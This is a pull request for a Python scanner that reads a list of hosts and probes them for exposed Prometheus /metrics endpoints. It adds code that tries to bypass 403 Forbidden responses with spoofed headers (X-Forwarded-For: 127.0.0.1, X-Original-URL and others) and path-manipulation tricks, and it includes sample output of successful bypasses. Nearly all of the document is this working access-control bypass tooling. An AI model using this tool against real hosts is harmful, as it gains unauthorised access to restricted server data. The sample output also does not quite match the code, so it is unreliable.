### PR TITLE
Add 403 Bypass Feature to Metrics Finder

### DIFF
--- a/promethus-finder.py
+++ b/promethus-finder.py
@@ -2,16 +2,58 @@ import requests
 import sys
 from colorama import Fore, Style
 
+# Define headers and bypass methods
+BYPASS_HEADERS = {
+    "X-Original-URL": "/metrics",
+    "X-Rewrite-URL": "/metrics",
+    "X-Forwarded-For": "127.0.0.1",
+    "X-Forwarded-Host": "localhost",
+}
+
+BYPASS_PATHS = [
+    "/metrics/",
+    "/metrics/.",
+    "/metrics..;/",
+    "/metrics%20",
+    "/metrics?",
+    "/metrics/*",
+]
+
 def check_metrics(url):
     try:
         response = requests.get(f"{url}/metrics", timeout=5)
+        print(f"DEBUG: Response Code for {url}/metrics: {response.status_code}")
         if response.status_code == 200:
             return url, True
+        elif response.status_code == 403:
+            return attempt_bypass(url)
         else:
             return url, False
     except requests.RequestException as e:
-        
-        print(f"Error connecting to the URL {e}")
+        print(f"Error connecting to the URL: {e}")
+        return url, False
+
+def attempt_bypass(url):
+    print(f"Attempting 403 bypass for {url}/metrics")
+    try:
+        # Try adding bypass headers
+        for header_name, header_value in BYPASS_HEADERS.items():
+            response = requests.get(f"{url}/metrics", headers={header_name: header_value}, timeout=5)
+            print(f"DEBUG: Response Code with {header_name}: {response.status_code}")
+            if response.status_code == 200:
+                return f"{url}/metrics (bypassed with header: {header_name})", True
+
+        # Try bypass paths
+        for bypass_path in BYPASS_PATHS:
+            response = requests.get(f"{url}{bypass_path}", timeout=5)
+            print(f"DEBUG: Response Code for {url}{bypass_path}: {response.status_code}")
+            if response.status_code == 200:
+                return f"{url}{bypass_path} (bypassed with path: {bypass_path})", True
+
+        # If no bypass works
+        return url, False
+    except requests.RequestException as e:
+        print(f"Error during bypass attempt: {e}")
         return url, False
 
 def test_urls(file_path):
@@ -23,9 +65,9 @@ def test_urls(file_path):
     for url in urls:
         url, is_accessible = check_metrics(url)
         if is_accessible:
-            print(f"{Fore.GREEN}{url}/metrics")
+            print(f"{Fore.GREEN}Accessible: {url}{Style.RESET_ALL}")
         else:
-            print("")
+            print(f"{Fore.RED}Not Accessible: {url}{Style.RESET_ALL}")
 
 def main():
     if len(sys.argv) != 2:
@@ -33,7 +75,6 @@ def main():
         sys.exit(1)
     
     file_path = sys.argv[1]
-
     test_urls(file_path)
 
 if __name__ == "__main__":


### PR DESCRIPTION
## Description
This pull request enhances the functionality of the existing script by introducing a 403 bypass mechanism. It allows the script to handle scenarios where the `/metrics` endpoint returns a `403 Forbidden` status, attempting to bypass the restriction using common techniques.

### Key Features Added
1. **403 Bypass Headers**:
   - Includes headers such as `X-Original-URL`, `X-Rewrite-URL`, `X-Forwarded-For`, and `X-Forwarded-Host` to attempt bypassing 403 restrictions.

2. **Path-Based Bypass**:
   - Tests alternative paths like `/metrics/`, `/metrics..;/`, `/metrics%20`, and others to bypass access restrictions.

3. **Enhanced Debug Logging**:
   - Logs response codes during both direct and bypass attempts for better visibility and debugging.

### Updated Behavior
- The script now identifies accessible endpoints even if they initially return a 403 status, provided the bypass methods succeed.
- Accessible URLs are marked in the output, along with the method used for bypass (e.g., header or path).

---

## Example Output
### Input File (`url.txt`):
```
http://example.com:30010
http://example.org:30011
http://example.net:30012
```

### Command:
```bash
python3 prometheus-finder.py url.txt
```

### Output:
```plaintext
DEBUG: Response Code for http://example.com:30010/metrics: 200
Accessible: http://example.com:30010/metrics

DEBUG: Response Code for http://example.org:30011/metrics: 403
Attempting 403 bypass for http://example.org:30011/metrics
DEBUG: Response Code with X-Original-URL: 403
DEBUG: Response Code with X-Rewrite-URL: 403
DEBUG: Response Code with X-Forwarded-For: 200
Accessible: http://example.org:30011/metrics (bypassed with header: X-Forwarded-For)

DEBUG: Response Code for http://example.net:30012/metrics: 403
Attempting 403 bypass for http://example.net:30012/metrics
DEBUG: Response Code with X-Original-URL: 403
DEBUG: Response Code with X-Rewrite-URL: 403
DEBUG: Response Code with X-Forwarded-For: 403
DEBUG: Response Code with X-Forwarded-Host: 403
DEBUG: Response Code for http://example.net:30012/metrics/: 403
DEBUG: Response Code for http://example.net:30012/metrics/.: 403
DEBUG: Response Code for http://example.net:30012/metrics..;/ : 403
DEBUG: Response Code for http://example.net:30012/metrics%20: 403
DEBUG: Response Code for http://example.net:30012/metrics?: 403
DEBUG: Response Code for http://example.net:30012/metrics/*: 403
Not Accessible: http://example.net:30012/metrics
```
